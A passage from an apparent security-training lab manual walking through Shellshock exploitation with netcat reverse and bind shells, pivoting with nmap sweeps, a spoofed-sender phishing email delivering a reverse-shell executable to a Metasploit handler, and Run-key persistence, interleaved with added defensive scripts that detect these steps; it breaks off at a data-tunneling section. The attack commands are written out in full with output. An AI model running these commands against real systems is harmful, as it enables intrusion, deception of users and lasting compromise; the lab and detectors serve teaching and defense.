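Detection logic for the header injection just described, written here as an added example (it is not code from the lab). It assumes the full raw request is available, as a WAF, IDS or full-request logging would provide; the sample requests are constructed, with a harmless echo in place of a real payload.

```python
"""Detect Shellshock function-definition payloads in HTTP headers (added example, not the lab's code)."""
import re
from typing import Dict, List, Tuple

# Bash 4.3 and earlier imported any environment variable whose value began with "() {" as a
# function, then ran whatever followed the closing brace.  A CGI server copies request headers
# into the environment (the header X: becomes HTTP_X), which is how a header value reaches bash.
FUNCTION_PREFIX = re.compile(r"^\(\)\s*\{")


def parse_headers(raw_request: str) -> Dict[str, str]:
    """Return a lower-cased header name -> value map from a raw HTTP request (request line dropped)."""
    headers: Dict[str, str] = {}
    lines = raw_request.replace("\r\n", "\n").split("\n")
    for line in lines[1:]:
        if not line.strip():
            break                       # blank line ends the header block
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def find_shellshock(headers: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (header, trailing command) for every header value bash would import as a function."""
    hits = []
    for name, value in headers.items():
        m = FUNCTION_PREFIX.match(value)
        if not m:
            continue
        body_end = value.find("}", m.end())
        # Text after the function body's closing "};" is the command an unpatched bash executes.
        trailing = value[body_end + 1:].lstrip("; ").strip() if body_end != -1 else ""
        hits.append((name, trailing))
    return hits


# Constructed requests: the probe mirrors the lab's curl -H 'X: () { :;}; ...' form with a harmless echo.
PROBE_REQUEST = (
    "GET /cgi-bin/sstest.sh HTTP/1.1\r\n"
    "Host: sploitme.abc.public\r\n"
    "User-Agent: curl/7.47.0\r\n"
    "Accept: */*\r\n"
    "X: () { :;}; echo vulnerable\r\n"
    "\r\n"
)
BENIGN_REQUEST = (
    "GET /cgi-bin/sstest.sh HTTP/1.1\r\n"
    "Host: sploitme.abc.public\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) {custom}\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, req in (("probe", PROBE_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, find_shellshock(parse_headers(req)))
```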

This lab task will take advantage of the Shell Shock vulnerability on the SploitMe host to open a reverse shell
connection to the Outside Kali host that is listening on the back door port.
Task 23
From the Outside Kali host, open Iceweasel (the web browser) and browse to http://sploitme.abc.public.

Answer

In the next step, you will perform a reverse shell connection from the SploitMe host (the exploited victim) to
the Outside Kali host (the attacker). For example, a reverse shell is used if a firewall is between the attacker
and the victim, and the firewall does not allow inbound connections from the attacker to the victim, which is
not the case in this lab scenario.

Task 24

From the Outside Kali host, open a terminal window, and enter the nc -lvp 9876 command to listen for incoming
connections on TCP port 9876. The nc -l option specifies that nc should listen for an incoming connection rather
than initiate a connection to a remote host. The nc -v option specifies a more verbose output. The nc -p option
specifies the source port.

Answer

The nc (or netcat) utility can be used to open TCP connections, send UDP packets, listen on arbitrary TCP and UDP
ports, do port scanning, and so on.

Terminal Window 1

root@Outside-Kali:~# nc -lvp 9876


listening on [any] 9876 ...
Task 25

From the Outside Kali host, open a second terminal window, and enter the curl -k -H 'X: () { :;};
/bin/bash -c "nc -e /bin/bash 209.165.200.235 9876"' http://sploitme.abc.public/cgi-bin/sstest.sh
command. This command is a bit tedious to type, so you can copy and paste it from the
AttackingEndpoints.txt file in the SECFND folder on the DVD drive (Cyber). The curl command is used to send a
request to the SploitMe remote server. The nc -e option specifies the file to execute after the connection.

Terminal Window 2

root@Outside-Kali:~# curl -k -H 'X: () { :;}; /bin/bash -c "nc -e /bin/bash
209.165.200.235 9876"' http://sploitme.abc.public/cgi-bin/sstest.sh

The command that is being injected is nc -e /bin/bash 209.165.200.235 9876. netcat is executing
/bin/bash (so that there is a Shell to interact with), and then connecting to the Outside-Kali host
(209.165.200.235) on TCP port 9876.

The first terminal window that was set up as a listener waiting for this connection should show a connection to
209.165.200.235 (Outside Kali host) from the SploitMe host (192.0.2.15 is the NAT translated public IP
address of the SploitMe host).

This demonstrates a reverse shell connection from the exploited SploitMe host back to the Outside Kali host
(in this case, the Outside Kali host represents the attacker's host).

Task 26

Go back to the first terminal window. You should see that a reverse shell connection spawned as shown below. From
the reverse shell connection, execute the whoami and pwd commands. You should see that the commands are
executed against the SploitMe host.

root@Outside-Kali:~# nc -lvp 9876


listening on [any] 9876 ...
connect to [209.165.200.235] from SploitMe.abc.public [192.0.2.15] 55086

whoami
www-data

pwd
/usr/lib/cgi-bin
Task 27

Exit the nc session.

Answer

exit
root@Outside-Kali:~#
curl will also terminate after you terminate the nc session.
root@Outside-Kali:~# curl -k -H 'X: () { :;}; /bin/bash -c "nc -e /bin/bash
209.165.200.235 9876"' http://sploitme.abc.public/cgi-bin/sstest.sh
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
webmaster@localhost and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
<hr>
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at sploitme.abc.public Port 80</address>
</body></html>
root@Outside-Kali:~#

You should have successfully used the Shellshock exploit on the SploitMe host to start a reverse shell connection to
the Outside Kali host.

In the next step, you will establish a shell connection in the other direction, from the Outside Kali host
(attacker) to the SploitMe host (the exploited victim). Because the victim listens and the attacker connects to it,
this is a bind shell rather than a reverse shell.

Task 28

From the Outside Kali host, in one terminal window enter the curl -k -H 'X: () { :;}; /bin/bash -c
"nc -e /bin/bash -lvp 9876"' http://sploitme.abc.public/cgi-bin/sstest.sh command. This will
cause the SploitMe host to execute nc -e /bin/bash -lvp 9876, which is the netcat command that provides
a bash shell and listens for incoming connections on TCP port 9876. You can copy and paste the long command
string from the AttackingEndpoints.txt file in the SECFND folder on the DVD drive (Cyber).

Answer

Terminal Window 1

root@Outside-Kali:~# curl -k -H 'X: () { :;}; /bin/bash -c "nc -e /bin/bash -lvp 9876"'
http://sploitme.abc.public/cgi-bin/sstest.sh

Task 29

From the Outside Kali host second terminal window, enter the nc sploitme.abc.public 9876 command to start
a shell connection to the SploitMe host on TCP port 9876. The shell connection should be successful.

Task 30

From the Shell connection, execute the whoami and pwd commands. You should see that the commands are executed
against the SploitMe host.

Answer
Terminal Window 2

root@Outside-Kali:~# nc sploitme.abc.public 9876

whoami
www-data

pwd
/usr/lib/cgi-bin

Task 31

Exit the nc session. This will also terminate the curl in the first terminal window.

Answer

exit

root@Outside-Kali:~#

This is a simple example of exploiting an operating system flaw. Although the Bash vulnerability Shellshock
has long been patched, similar operating system flaws are constantly being exploited by threat actors.
Security analysts should be aware of the operating system flaws that are being discovered and patch them
immediately as updates become available.
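As an added example that is not part of this lab and not the lab's own tooling, the following Python script shows what a defender can do with the pattern just demonstrated: it scans the headers of raw HTTP requests for the Shellshock function-definition prefix and for a netcat/bash network shell payload, and it runs the standard local self-test to report whether the machine's own bash is patched. The two sample requests are constructed for this example; the hostname sploitme.abc.public, the CGI path and the address 209.165.200.235 are taken from the lab.

```python
import os
import re
import shutil
import subprocess
from typing import Dict, List, Optional

# A bash function export starts with "() {"; a vulnerable bash keeps parsing past
# the closing brace and runs whatever follows.  Every request header that reaches a
# CGI script becomes an environment variable, so this is the prefix to watch for.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Indicators that the injected body spawns a shell over the network: netcat with
# -e/-c, bash's /dev/tcp redirection, or an interactive bash.
NET_SHELL_RE = re.compile(r"\b(nc|netcat|ncat)\s+.*-[ec]\b|/dev/tcp/|\bbash\s+-i\b", re.IGNORECASE)


def parse_headers(raw_request: str) -> Dict[str, str]:
    """Split the header block of a raw HTTP request into a {lowercase-name: value} dict."""
    headers: Dict[str, str] = {}
    for line in raw_request.split("\r\n")[1:]:   # skip the request line
        if line == "":                              # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def classify_request(raw_request: str) -> List[str]:
    """Return findings for one request; an empty list means nothing matched."""
    findings: List[str] = []
    for name, value in parse_headers(raw_request).items():
        if SHELLSHOCK_RE.search(value):
            findings.append(f"shellshock pattern in header '{name}'")
            if NET_SHELL_RE.search(value):
                findings.append(f"network shell payload in header '{name}'")
    return findings


def bash_is_vulnerable() -> Optional[bool]:
    """Run the standard Shellshock self-test against the local bash only.

    True means bash executed the code that followed the function body, False means
    it is patched, None means no bash is installed on this machine.
    """
    bash = shutil.which("bash")
    if bash is None:
        return None
    env = {"PATH": os.environ.get("PATH", ""), "x": "() { :;}; echo vulnerable"}
    result = subprocess.run([bash, "-c", "echo test"], env=env, capture_output=True, text=True)
    return "vulnerable" in result.stdout


# Constructed sample requests (not from a real capture).  The first mirrors the
# lab's curl command; the second is an ordinary GET to the same CGI script.
SHELLSHOCK_REQUEST = (
    "GET /cgi-bin/sstest.sh HTTP/1.1\r\n"
    "Host: sploitme.abc.public\r\n"
    "User-Agent: curl\r\n"
    'X: () { :;}; /bin/bash -c "nc -e /bin/bash 209.165.200.235 9876"\r\n'
    "\r\n"
)
NORMAL_REQUEST = (
    "GET /cgi-bin/sstest.sh HTTP/1.1\r\n"
    "Host: sploitme.abc.public\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, request in (("shellshock", SHELLSHOCK_REQUEST), ("normal", NORMAL_REQUEST)):
        print(label, classify_request(request) or "clean")
    print("local bash vulnerable:", bash_is_vulnerable())
```

The header check is what a web application firewall or IDS signature for this bug amounts to; note that Apache's default access log does not record arbitrary request headers, so to see the payload after the fact you need a full request log or a packet capture, which is one reason the lab's attack leaves so little trace on the victim.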

Use a Pivot
Pivoting is a central concept in network attacks. If a threat actor is on host A and wants to reach host C, but
defenses prevent host A from accessing host C, then a pivot may be useful. If there is a host B that is
accessible to host A and, in turn, has access to host C, it is a potential pivot point. If the threat actor on host A
can compromise host B, then the threat actor can pivot from host B to reach host C.

This section of the lab exercise will demonstrate this pivoting concept. Using the previously exploited
SploitMe host, you will pivot from the Outside Kali host to the SploitMe host and then, from the SploitMe host,
perform reconnaissance on the inside hosts.

Task 32

The most convenient exploit that you already have in place to use for this lab task is the SSH root access to the
SploitMe host. From the Outside Kali host, SSH to the SploitMe Host.

Answer

root@Outside-Kali:~# ssh sploitme.abc.public
Last login: Tue Sep 27 15:16:36 2016 from 209.165.200.235
Linux SploitMe 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.

root@SploitMe:~#

Task 33

Use the nmap -sP command to find the active hosts on the inside subnets. You could scan the entire 10.0.0.0/8
network, but it would take a very long time. For convenience, scan just the 10.10.3.0/24 and 10.10.4.0/24 inside
subnets. The nmap -sP option pings the given IP address range to check whether the hosts are alive. This scan may take a
couple of minutes to complete. You should see the hosts on both inside subnets being discovered.

Answer

root@SploitMe:~# nmap -sP 10.10.3.0/24 10.10.4.0/24

Starting Nmap 4.53 ( http://insecure.org ) at 2016-09-29 14:17 EDT
Host 10.10.3.1 appears to be up.
Host 10.10.3.10 appears to be up.
Host 10.10.3.41 appears to be up.
Host 10.10.4.1 appears to be up.
Host 10.10.4.20 appears to be up.
Nmap done: 512 IP addresses (5 hosts up) scanned in 103.191 seconds

Task 34

Use the nmap -O 10.10.3.1 command to scan 10.10.3.1. The nmap -O option enables operating system detection.
You should see that the result of the nmap scan shows the open ports on 10.10.3.1, and that 10.10.3.1 is probably a
Cisco Catalyst switch, together with the guessed IOS version.

Answer

root@SploitMe:~# nmap -O 10.10.3.1

Starting Nmap 4.53 ( http://insecure.org ) at 2016-09-29 14:29 EDT
Interesting ports on 10.10.3.1:
Not shown: 1712 closed ports
PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
Device type: switch|router
Running (JUST GUESSING) : Cisco IOS 12.X|12.2 (91%), Cisco embedded (86%)
Aggressive OS guesses: Cisco Catalyst 2960 switch (91%), Cisco 2821 router (89%), Cisco
C3500XL switch (IOS 12.0(5)) (88%), Cisco 3750 switch (IOS 12.2) (87%), Cisco Catalyst
1900 Switch, Software v9.00.03 (86%)
No exact OS matches for host (test conditions non-ideal).

OS detection performed. Please report any incorrect results at
http://insecure.org/nmap/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.341 seconds

Pivoting is the technique of using a compromised system (also referred to as a "foothold") to move around the
network. The first compromised host allows and aids in the compromise of other systems that would
otherwise be inaccessible. This section of the lab exercise demonstrated a simple pivot from the Outside Kali
host to the SploitMe host by using a vulnerability on the SploitMe host that you exploited in an earlier lab
task. By pivoting to the SploitMe host, you were able to use the nmap command to discover the inside hosts.
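The ping sweep that the pivoted attacker ran in Task 33 is visible from the defender's side as one internal host touching many addresses over ICMP in a short time. The following Python script, added here as an example and not part of the lab, applies that rule to flow records in a simple constructed "timestamp,src,dst,proto" format (the kind of record a firewall, NetFlow collector or Zeek conn log can be reduced to). The records are generated in the script; the address 10.10.5.50 is a placeholder for the compromised pivot host and is not from the lab, while 10.10.3.0/24 and the hosts 10.10.3.1, 10.10.3.10 and 10.10.3.41 are.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, Iterable, List, Tuple


def parse_flow(line: str) -> Tuple[float, str, str, str]:
    """Parse one 'timestamp,src,dst,proto' record into (epoch seconds, src, dst, proto)."""
    ts, src, dst, proto = line.strip().split(",")
    return datetime.fromisoformat(ts).timestamp(), src, dst, proto.lower()


def detect_sweeps(lines: Iterable[str], min_hosts: int = 20, window_s: float = 60.0,
                  proto: str = "icmp") -> Dict[str, int]:
    """Map each source that reached at least min_hosts distinct destinations over `proto`
    inside some window_s-second window to the peak number of distinct destinations seen."""
    by_src: Dict[str, List[Tuple[float, str]]] = defaultdict(list)
    for line in lines:
        ts, src, dst, p = parse_flow(line)
        if p == proto:
            by_src[src].append((ts, dst))

    alerts: Dict[str, int] = {}
    for src, events in by_src.items():
        events.sort()
        window: Deque[Tuple[float, str]] = deque()
        live: Dict[str, int] = defaultdict(int)   # destination -> packets still in the window
        peak = 0
        for ts, dst in events:
            window.append((ts, dst))
            live[dst] += 1
            while ts - window[0][0] > window_s:   # expire packets older than the window
                _, old_dst = window.popleft()
                live[old_dst] -= 1
                if live[old_dst] == 0:
                    del live[old_dst]
            peak = max(peak, len(live))
        if peak >= min_hosts:
            alerts[src] = peak
    return alerts


def build_sample_log() -> List[str]:
    """Constructed flow records: a sweep of 10.10.3.0/24 from a compromised host
    (placeholder address 10.10.5.50) plus a workstation pinging its gateway."""
    start = datetime(2016, 9, 29, 14, 17, 0)
    lines: List[str] = []
    for i in range(1, 255):                      # one echo request per host, 0.4 s apart
        ts = start + timedelta(seconds=0.4 * i)
        lines.append(f"{ts.isoformat()},10.10.5.50,10.10.3.{i},icmp")
    for i in range(5):                           # benign: a few pings to the gateway
        ts = start + timedelta(seconds=1.0 * i)
        lines.append(f"{ts.isoformat()},10.10.3.41,10.10.3.1,icmp")
    lines.append(f"{start.isoformat()},10.10.3.41,10.10.3.10,tcp")   # unrelated TCP flow
    return lines


if __name__ == "__main__":
    for src, hosts in detect_sweeps(build_sample_log()).items():
        print(f"possible ping sweep from {src}: {hosts} distinct hosts within 60 s")
```

The threshold of 20 distinct destinations in a minute is an assumption to tune per network; monitoring systems and backup servers legitimately touch many hosts and belong on an allow-list. The same sliding-window count applied to distinct TCP ports per destination catches the port scan that an nmap -O run produces.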

Employ Social Engineering/Phishing

A common way of attacking a host is to attack the user on the host. Client-side attacks can be the most
effective method for gaining entry into protected networks. Often the networks have defenses that prevent
connections originating from the Internet to internal systems. On the other hand, network defenses are often
quite permissive in allowing connections from the inside to systems on the Internet.

Phishing is a social engineering technique which takes different forms. One simple form is to send an email
with a malicious attachment. If the user can be tricked into opening the malicious attachment, a malicious
process can be introduced on their internal system, which can then connect the internal system to the external
threat actor.

In this section of the lab exercise, you will send a phishing email. You will source the email from the outside,
but you will make it seem to be coming from a peer internal user. When this attachment is opened, it will
launch a reverse TCP connection back to a system under the threat actor's control.

We have already prepared a malicious file attachment that, on a Windows system, will open a reverse TCP
connection back to the Outside Kali host, destination port 4444.

Task 35

From the Outside Kali host, use the file explorer to navigate to the SECFND directory on the DVD drive. Drag and drop
the reverseSh-235.exe file to the desktop. Then right-click and rename the file x.exe.

Answer

Task 36
From the Outside Kali host, click the Icedove icon on the left to launch Icedove. Icedove is the Debian-branded
build of Thunderbird, Mozilla's open source email client.

Click Write to compose an email:

1. Drag and drop the x.exe file into the header area of the email so that it becomes an attachment.
2. From: Click and select Customize From Address. Change the sender to Kevin <kevin@abc.public>.
3. To: wendy@abc.public
4. Subject: That’s a cool game!
5. Body: Hey Wendy, Remember that cool game? I attached it. It's lots of fun!
Your friend Kevin
6. Click Send.

Answer
Task 37

From the Outside Kali host, launch a Metasploit listener on port 4444 that will accept the reverse connection once the
malicious attachment is opened. Click the MetaSploit Framework icon (M on the Shield) on the left to launch the MSF
console (msf >), then enter the following to start the Metasploit listener on port 4444.

msf > use exploit/multi/handler


msf exploit(handler) > set lhost 209.165.200.235
lhost => 209.165.200.235
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > run

[*] Started reverse TCP handler on 209.165.200.235:4444


[*] Starting the payload handler...
Task 38

Access the Inside Windows host console. Open the Thunderbird mail client. Open the email from Kevin and save the
x.exe attachment to the desktop.

Answer
Task 39

Launch x.exe. Of course, there is a warning. Uncheck the box for “Always ask before opening this file.” This is required
in order for the next task to work as expected.

Answer

Note: To the user, nothing seems to happen when the x.exe file executes.
Task 40
Return to the Outside Kali host. You should see that a Meterpreter session is established between
209.165.200.235 (Outside Kali host) port 4444 and 192.0.2.2 (Inside Windows host NAT translated public IP
address).

Answer

[*] Sending stage (957999 bytes) to 192.0.2.2


[*] Meterpreter session 1 opened (209.165.200.235:4444 -> 192.0.2.2:1708) at 2016-09-27
13:51:39 -0700

meterpreter >
Task 41
Enter the sysinfo and the getuid commands to verify that you have a reverse connection open to the Inside
Windows host as the admin user.

Answer

meterpreter > sysinfo


Computer : INSIDE-WIN
OS : Windows 10 (Build 10586).
Architecture : x64 (Current Process is WOW64)
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32

meterpreter > getuid


Server username: INSIDE-WIN\admin
Wendy, the mail recipient, is logged in to the Inside Windows host as the local admin account, not as a Wendy
account. Local admin is good! You got a standard shell on the Inside Windows host when Wendy opened the
malicious attachment in her email.

Note

Leave the Meterpreter session running because you will need to use it in the next section of the lab exercise.

In a social engineering attack, an attacker uses human interaction (social skills) to obtain or compromise
information about an organization or its computer systems.

This section of the lab exercise demonstrated a simple but very common social engineering/phishing attack by
using email as the attack vector. If the victim is tricked into opening the malicious email attachment, the
victim’s machine will be compromised—and usually the victim is unaware that it has been compromised.

One of the best preventive measures against social engineering/phishing attacks is to train users to protect
themselves, for example:

• Be very suspicious of unsolicited phone calls, visits, or email messages from individuals asking for
any sensitive information. If an unknown individual claims to be from a legitimate organization, try to
verify his or her identity directly with the company.
• Do not provide personal information, or information about your organization, including its structure or
networks, unless you are certain of a person's authority to have the information.
• Pay attention to the URL of a website. At first glance, malicious web sites and legitimate web sites
may look identical.
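User training is the last line; the mail gateway is the first. As an added example that is not part of the lab, the following Python script shows two gateway checks that would have stopped the message sent in Task 36 before Wendy saw it: the From address claims the internal domain while the earliest Received hop is an external address, and the attachment is a Windows executable both by file extension and by its MZ header. The sample message is constructed here with the lab's addresses and text; the Received line, the mail server name mail.abc.public and the internal network range 10.0.0.0/8 are assumptions for the example.

```python
import email
import ipaddress
import re
from email import policy
from email.message import EmailMessage
from email.utils import parseaddr
from typing import List

INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]   # assumed internal address space
INTERNAL_DOMAINS = {"abc.public"}                        # the lab's internal mail domain
EXEC_EXTENSIONS = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".ps1")
RECEIVED_IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def first_hop_ip(msg) -> str:
    """Address of the host that handed the message to our first server.
    Received headers are prepended as the mail travels, so the last one is the earliest hop."""
    for header in reversed(msg.get_all("Received") or []):
        match = RECEIVED_IP_RE.search(header)
        if match:
            return match.group(1)
    return ""


def is_internal_ip(ip: str) -> bool:
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)


def analyze_message(raw: str) -> List[str]:
    """Return the gateway findings for one RFC 5322 message; empty means it passed."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings: List[str] = []
    sender = parseaddr(msg.get("From", ""))[1]
    domain = sender.rpartition("@")[2].lower()
    hop = first_hop_ip(msg)
    if domain in INTERNAL_DOMAINS and hop and not is_internal_ip(hop):
        findings.append(f"internal sender {sender} but message entered from external host {hop}")
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        data = part.get_payload(decode=True) or b""
        if name.endswith(EXEC_EXTENSIONS):
            findings.append(f"executable attachment {name}")
        if data[:2] == b"MZ":                       # DOS/PE header, whatever the extension says
            findings.append(f"attachment {name} carries a Windows PE (MZ) header")
    return findings


def build_sample_message() -> str:
    """Constructed message mirroring the lab's phishing mail.  The Received line is invented
    to show the external relay hop; 209.165.200.235 is the Outside Kali host from the lab."""
    msg = EmailMessage()
    msg["Received"] = ("from unknown ([209.165.200.235]) by mail.abc.public "
                       "with SMTP; Tue, 27 Sep 2016 13:50:01 -0700")
    msg["From"] = "Kevin <kevin@abc.public>"
    msg["To"] = "wendy@abc.public"
    msg["Subject"] = "That's a cool game!"
    msg.set_content("Hey Wendy, Remember that cool game? I attached it. It's lots of fun!\n"
                    "Your friend Kevin\n")
    # Constructed stand-in for x.exe: a PE header followed by padding, not a real program.
    msg.add_attachment(b"MZ\x90\x00" + b"\x00" * 60, maintype="application",
                       subtype="octet-stream", filename="x.exe")
    return msg.as_string()


if __name__ == "__main__":
    for finding in analyze_message(build_sample_message()):
        print("REJECT:", finding)
```

The Received-hop check is the manual form of what SPF and DMARC automate: mail claiming an internal sender domain should only enter through the organisation's own submission path. Blocking executables by content rather than by name matters because the lab itself renamed reverseSh-235.exe to x.exe; an attacker can just as easily rename it to x.txt.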

Establish Persistence
Similar to privilege escalation and pivoting, persistence is another core concept that is leveraged by threat
actors. Spawning a reverse connection is useful, but if the user does something that disconnects the host from the
network, such as a reboot, the attacker's reverse connection is terminated and cannot be initiated again
unless the attacker has established a persistent presence.

In this section of the lab exercise, you will use the reverse connection that you obtained in the previous lab
task to update the Inside Windows host registry setting so that the reverse connection launches whenever the
user logs into the Inside Windows host.

Task 42
From the Outside-Kali host existing Meterpreter session, enter the shell command to open a command line
on the Inside Windows host.

Answer

meterpreter > shell


Process 3640 created.
Channel 1 created.
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\admin\Desktop>
Task 43
The x.exe malicious email attachment from the previous steps should still be on the Inside Windows desktop.
Use the copy x.exe c:\logs command to copy the file to a less obvious location (in the logs directory).

Answer
C:\Users\admin\Desktop>copy x.exe c:\Logs
copy x.exe c:\Logs
1 file(s) copied.

Note the following:

• Once the attacker has compromised a system, they often perform tasks to hide their tracks.
• Attackers need to destroy evidence of their presence and activities for several reasons, such as being
able to maintain access and evade detection.
• It is imperative for attackers to make the system look exactly as it did before they gained access and
established back doors for their use.

Task 44
Add the hidden c:\Logs\x.exe executable to the Run list in the Windows registry so that it is executed at every
logon. Instead of typing in the long command string in the example, you can copy and paste it from the
AttackingEndpoints.txt file in the SECFND folder on the DVD drive (Cyber).

Answer

C:\Users\admin\Desktop>REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V
"My App" /t REG_SZ /F /D "C:\Logs\x.exe"
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "My App" /t REG_SZ /F
/D "C:\Logs\x.exe"
The operation completed successfully.

Note the following:

• Editing the Windows registry setting to enable a malicious executable to run every time that the user
logs in is one example of how attackers can enable a persistent presence on the compromised host.
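The Run key written in Task 44 is one of the first places a responder looks. As an added example, not code from the lab, the following Python script audits Run entries and flags any executable that does not live under the standard program directories. On a Windows host it reads the live HKCU and HKLM keys through the standard winreg module; elsewhere it works on a constructed list that includes the lab's "My App" entry. The trusted-directory list and the second, benign "VendorUpdater" entry are assumptions for the example.

```python
import re
from typing import Iterable, List, Tuple

# Assumed allow-list of directories where legitimate autostart programs live.
TRUSTED_DIRS = (r"c:\program files", r"c:\windows")

RunEntry = Tuple[str, str, str]   # (hive, value name, command string)


def command_path(value: str) -> str:
    """Extract the executable path from a Run value such as '"C:\\x\\a.exe" /flag' or 'C:\\x\\a.exe'."""
    value = value.strip()
    if value.startswith('"'):                      # quoted path, possibly followed by arguments
        end = value.find('"', 1)
        return value[1:end] if end > 0 else value[1:]
    match = re.match(r"(.+?\.exe)(\s|$)", value, re.IGNORECASE)
    return match.group(1) if match else value.split()[0]


def audit_run_entries(entries: Iterable[RunEntry],
                      trusted_dirs: Tuple[str, ...] = TRUSTED_DIRS) -> List[Tuple[str, str, str, str]]:
    """Return (hive, name, path, reason) for every entry whose executable sits outside trusted_dirs."""
    findings: List[Tuple[str, str, str, str]] = []
    for hive, name, value in entries:
        path = command_path(value).lower()
        if not any(path.startswith(d) for d in trusted_dirs):
            findings.append((hive, name, path, "executable outside trusted program directories"))
    return findings


def read_run_entries() -> List[RunEntry]:
    """Read the HKCU and HKLM Run keys on a Windows host; returns [] on other platforms."""
    try:
        import winreg
    except ImportError:
        return []
    entries: List[RunEntry] = []
    for hive_name, hive in (("HKCU", winreg.HKEY_CURRENT_USER), ("HKLM", winreg.HKEY_LOCAL_MACHINE)):
        try:
            key = winreg.OpenKey(hive, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
        except OSError:
            continue
        with key:
            index = 0
            while True:
                try:
                    name, value, _ = winreg.EnumValue(key, index)
                except OSError:                    # raised once the values are exhausted
                    break
                entries.append((hive_name, name, str(value)))
                index += 1
    return entries


# Constructed sample: the lab's "My App" entry plus an assumed benign vendor entry.
SAMPLE_RUN_ENTRIES: List[RunEntry] = [
    ("HKCU", "My App", r"C:\Logs\x.exe"),
    ("HKLM", "VendorUpdater", r'"C:\Program Files\Vendor\updater.exe" /silent'),
]

if __name__ == "__main__":
    entries = read_run_entries() or SAMPLE_RUN_ENTRIES
    for hive, name, path, reason in audit_run_entries(entries):
        print(f"{hive}\\...\\Run  {name!r} -> {path}: {reason}")
```

A path allow-list is a coarse first pass; a fuller audit also checks the file's signature and hash, the RunOnce keys, and the scheduled tasks and logon scripts mentioned at the end of this section. The registry write itself is also loggable: auditing the Run key for value changes turns Task 44 into an event at the moment it happens rather than a finding on the next sweep.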

Task 45
Exit the session to the Inside Windows host in order to return to the Meterpreter session. Then put the
Meterpreter session in the background:

Answer

C:\Users\admin\Desktop>exit
exit

meterpreter > background


[*] Backgrounding session 1...
Task 46
Use the sessions command to verify that the Meterpreter session is in the background.

Answer

msf exploit(handler) > sessions

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 INSIDE-WIN\admin @ INSIDE-WIN 209.165.200.235:4444 ->
192.0.2.2:1708 (10.10.6.10)

Task 47
Enter run to start a new listener.

Answer
msf exploit(handler) > run

[*] Started reverse TCP handler on 209.165.200.235:4444
[*] Starting the payload handler...

Task 48
Access the Inside Windows host desktop. Restart the Inside Windows host. Wait for it to come up. It will
auto-log in as admin. Immediately return to the Outside-Kali host. You should see that the background
Meterpreter session died when the Inside Windows host rebooted.

Answer

[*] Started reverse TCP handler on 209.165.200.235:4444
[*] Starting the payload handler...
[*] 10.10.6.10 - Meterpreter session 1 closed. Reason: Died

About a minute after the Inside Windows host has been restarted, a new reverse TCP connection should launch and
you should have an active Meterpreter session again.

[*] 10.10.6.10 - Meterpreter session 1 closed. Reason: Died
[*] Sending stage (957999 bytes) to 192.0.2.2
[*] Meterpreter session 2 opened (209.165.200.235:4444 -> 192.0.2.2:1550) at 2016-09-29
14:46:44 -0700

Task 49
Enter the sysinfo and the getuid commands to verify that you have a reverse connection opened to the
Inside Windows host as the admin user.

Answer

meterpreter > sysinfo


Computer : INSIDE-WIN
OS : Windows 10 (Build 10586).
Architecture : x64 (Current Process is WOW64)
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32

meterpreter > getuid


Server username: INSIDE-WIN\admin

Note the following:

• This step validates that you have a persistent presence on the Inside Windows host. Even if the Inside
Windows host is restarted, the reverse TCP connection from the Inside Windows host (the victim) to
the Outside Kali host (the attacker) will still be successful.

Task 50
Exit the Meterpreter session.

Answer

meterpreter > exit


[*] Shutting down Meterpreter...
[*] 10.10.6.10 - Meterpreter session 2 closed. Reason: User exit

msf exploit(handler) > exit

root@Outside-Kali:~#

In this section of the lab exercise, we demonstrated how attackers can maintain a persistent presence by
modifying a Windows registry setting. There are many other ways attackers can maintain persistence,
for example, by tampering with the basic input/output system (BIOS), infecting the boot sectors of a hard drive,
using Windows logon scripts, and using the Windows Task Scheduler.

Tunnel Exfiltrated Data

After taking advantage of a pivot, gaining access, making that access persistent, and escalating privilege, often
the end game of the threat actor is to exfiltrate data. A clever method of exfiltration is to tunnel the data. There
are several potential motives for using tunnels. It may be that only certain protocols (for example HTTP, DNS, or
ICMP) are allowed through the firewalls. If a disallowed protocol is required to pass through the
